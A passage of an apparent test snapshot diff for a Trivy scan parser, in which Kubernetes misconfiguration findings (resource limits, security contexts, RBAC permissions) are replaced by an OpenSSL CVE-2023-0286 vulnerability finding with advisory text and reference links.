"https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0286", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0286", + "https://access.redhat.com/security/cve/cve-2023-0286", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "https://linux.oracle.com/cve/CVE-2023-0286.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.requests.cpu')", + "category": "Vulnerability", + "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "X.400 address type confusion in X.509 GeneralName", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://avd.aquasec.com/nvd/cve-2023-0286", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://access.redhat.com/security/cve/CVE-2023-0286", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://access.redhat.com/security/cve/cve-2023-0286", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugzilla.redhat.com/2164440", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'lurker' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/2164492", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'lurker' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'trivy' of Job 'scan-trivy-k8s-dnnfb' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-dnnfb' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-public&Kind=Role&Name=system:controller:bootstrap-signer", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system:controller:bootstrap-signer' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system::leader-locking-kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-controller-manager", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-controller-manager' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system::leader-locking-kube-scheduler' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-scheduler", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-scheduler' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:bootstrap-signer", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:cloud-provider' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:cloud-provider", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system:controller:cloud-provider' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:token-cleaner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:token-cleaner", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Role&Name=kubernetes-dashboard", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Role&Name=kubernetes-dashboard", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'kubernetes-dashboard' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/leader-election-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Role&Name=leader-election-role", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'leader-election-role' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV044", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv044", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits wildcard verb on wildcard resource", - "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", - "mitigation": "Create a role which does not permit wildcard verb on wildcard resource", - "name": "No wildcard verb and resource roles(Role permits wildcard verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv044", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": 